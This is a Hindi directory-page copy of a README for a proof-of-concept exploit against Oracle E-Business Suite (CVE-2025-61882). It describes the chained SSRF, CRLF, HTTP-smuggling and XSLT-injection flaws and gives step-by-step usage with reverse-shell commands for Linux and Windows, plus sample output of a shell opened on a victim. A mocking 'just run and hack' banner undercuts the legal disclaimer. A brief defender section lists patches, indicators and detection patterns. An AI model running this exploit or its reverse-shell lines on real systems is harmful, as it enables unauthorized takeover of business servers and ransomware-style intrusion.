Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/mindflarex/cve-2025-61882-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubmindflarex/cve-2025-61882-poc

CVE-2025-61882-POC

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

CVE-2025-61882 के लिए एक शोषण, जो Oracle E-Business Suite में एक महत्वपूर्ण pre-auth RCE है। यह unauthenticated remote code execution के लिए SSRF, CRLF injection, HTTP smuggling, और XSLT injection को जोड़ता है।

रिपॉजिटरी देखें
23 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2025-61882 सुरक्षा परीक्षण उपकरण

CVSS Status Platform License

🚨 गंभीर कानूनी चेतावनी

तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨   ║
║                                                              ║
║  By using this tool, you acknowledge and agree that:         ║
║                                                              ║
║                                                              ║
║                 FCK THIS JUST RUN AND HACK                   ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝

📋 अवलोकन

CVE-2025-61882 के लिए सुरक्षा परीक्षण उपकरण, जो Oracle E-Business Suite को प्रभावित करने वाली एक गंभीर प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन कमज़ोरी है।

निर्माता: Mindflare

कमज़ोरी के विवरण

  • CVE ID: CVE-2025-61882
  • CVSS स्कोर: 9.8 (गंभीर)
  • हमला वेक्टर: नेटवर्क (अप्रमाणित)
  • हमला जटिलता: मध्यम
  • आवश्यक विशेषाधिकार: कोई नहीं
  • उपयोगकर्ता इंटरैक्शन: कोई नहीं
  • प्रभावित संस्करण: Oracle E-Business Suite 12.2.3 - 12.2.14
  • पैच स्थिति: 4 अक्टूबर 2025 को आपातकालीन पैच जारी किया गया
  • शोषण स्थिति: ⚠️ सक्रिय रूप से शोषित Cl0p ransomware द्वारा अगस्त 2025 से

तकनीकी सारांश

CVE-2025-61882 एक परिष्कृत शोषण श्रृंखला है जो पाँच अलग-अलग कमज़ोरियों को जोड़ती है:

  1. SSRF - /OA_HTML/configurator/UiServlet के माध्यम से सर्वर-साइड रिक्वेस्ट फोर्जरी
  2. CRLF इंजेक्शन - return_url पैरामीटर में HTTP हेडर इंजेक्शन
  3. HTTP स्मगलिंग - आंतरिक सेवाओं तक पहुंचने के लिए Keep-alive कनेक्शन का दुरुपयोग (पोर्ट 7201)
  4. प्रमाणीकरण बायपास - /OA_HTML/help/../ उपसर्ग के माध्यम से पथ ट्रैवर्सल
  5. XSLT इंजेक्शन - दुर्भावनापूर्ण XSL टेम्पलेट प्रसंस्करण RCE की ओर ले जाता है

🎯 इच्छित उपयोग के मामले

✅ स्वीकार्य उपयोग

  • लिखित अनुमति के साथ अधिकृत पेनिट्रेशन परीक्षण
  • आपके स्वामित्व वाले सिस्टम पर सुरक्षा अनुसंधान
  • नियंत्रित प्रयोगशाला वातावरण में कमज़ोरी का सत्यापन
  • उचित दायरे के दस्तावेज़ीकरण के साथ रेड टीम अभ्यास
  • संस्थागत अनुमोदन के साथ शैक्षणिक अनुसंधान
  • घटना प्रतिक्रिया और फोरेंसिक विश्लेषण

❌ निषिद्ध उपयोग

  • कोई भी अनधिकृत सिस्टम पहुंच
  • स्पष्ट लिखित अनुमति के बिना सिस्टम का परीक्षण
  • दुर्भावनापूर्ण गतिविधियाँ या हानि पहुँचाना
  • अनुमोदन के बिना उत्पादन सिस्टम पर हमला करना
  • आपराधिक उद्देश्यों के लिए उपयोग
  • लागू कानूनों का उल्लंघन करने वाली कोई भी गतिविधि

📦 स्थापना

पूर्वापेक्षाएँ

  • Python 3.7 या उच्चतर
  • pip पैकेज मैनेजर
  • लक्ष्य तक नेटवर्क कनेक्टिविटी (केवल अधिकृत)
  • रिवर्स शेल प्राप्त करने के लिए Netcat या समान लिसनर

सेटअप

root@kitploit:~
# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC

# Install dependencies
pip3 install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py

🚀 उपयोग

चरण 1: अपना लिसनर सेट करें

एक अलग टर्मिनल में, netcat लिसनर शुरू करें:

root@kitploit:~
# Linux/Mac
nc -lvnp 4444

# Windows
nc.exe -lvnp 4444

चरण 2: उपकरण चलाएँ

मूल उपयोग (लिनक्स लक्ष्य):

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
  --platform linux

विंडोज़ लक्ष्य:

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
  --platform windows

पैरामीटर

पैरामीटरविवरणआवश्यकउदाहरण
--targetलक्ष्य Oracle EBS URLहाँhttp://192.168.1.22:8000
--lhostआपका IP पता (कॉलबैक के लिए)हाँ192.168.1.10
--lportHTTP सर्वर पोर्ट (XSL पेलोड प्रदान करता है)हाँ80 या 8080
--commandलक्ष्य पर निष्पादित करने का कमांडहाँऊपर उदाहरण देखें
--platformलक्ष्य OS: linux या windowsहाँlinux

📊 उदाहरण आउटपुट

उपकरण आउटपुट

root@kitploit:~
[*] Target URL:    http://192.168.1.22:8000
[*] Listener IP:   192.168.1.10
[*] Listener Port: 80
[*] Platform:      linux

[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully

[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully

Netcat लिसनर आउटपुट (यदि कमज़ोर है)

root@kitploit:~
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$

🛡️ पहचान और बचाव

सुरक्षा रक्षकों के लिए

तत्काल कार्रवाई

  1. Oracle आपातकालीन पैच लागू करें (दस्तावेज़ ID: 30061882.1)
  2. समझौता की खोज करें:
    root@kitploit:~
    SELECT * FROM XDO_TEMPLATES_B 
    WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
    
  3. अगस्त 2025 से एक्सेस लॉग की समीक्षा करें
  4. EBS सर्वर से आउटबाउंड इंटरनेट ब्लॉक करें

पहचान संकेतक

नेटवर्क IOC:

root@kitploit:~
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)

HTTP पैटर्न:

  • POST /OA_HTML/configurator/UiServlet
  • POST /OA_HTML/SyncServlet
  • GET /OA_HTML/help/../*.jsp
  • पैरामीटर में CRLF अक्षर

📚 संदर्भ

  • Oracle सुरक्षा अलर्ट सलाहकार
  • CISA KEV कैटलॉग
  • Google/Mandiant विश्लेषण
  • watchTowr Labs अनुसंधान

📜 लाइसेंस

शैक्षिक उपयोग प्रतिबंधों के साथ MIT लाइसेंस - LICENSE देखें

अस्वीकरण: यह सॉफ़्टवेयर केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम में अनधिकृत पहुंच गैरकानूनी है। लेखक दुरुपयोग के लिए कोई देयता नहीं मानता।


निर्माता: Mindflare | अंतिम अद्यतन: अक्टूबर 2025

टूल डाउनलोड करें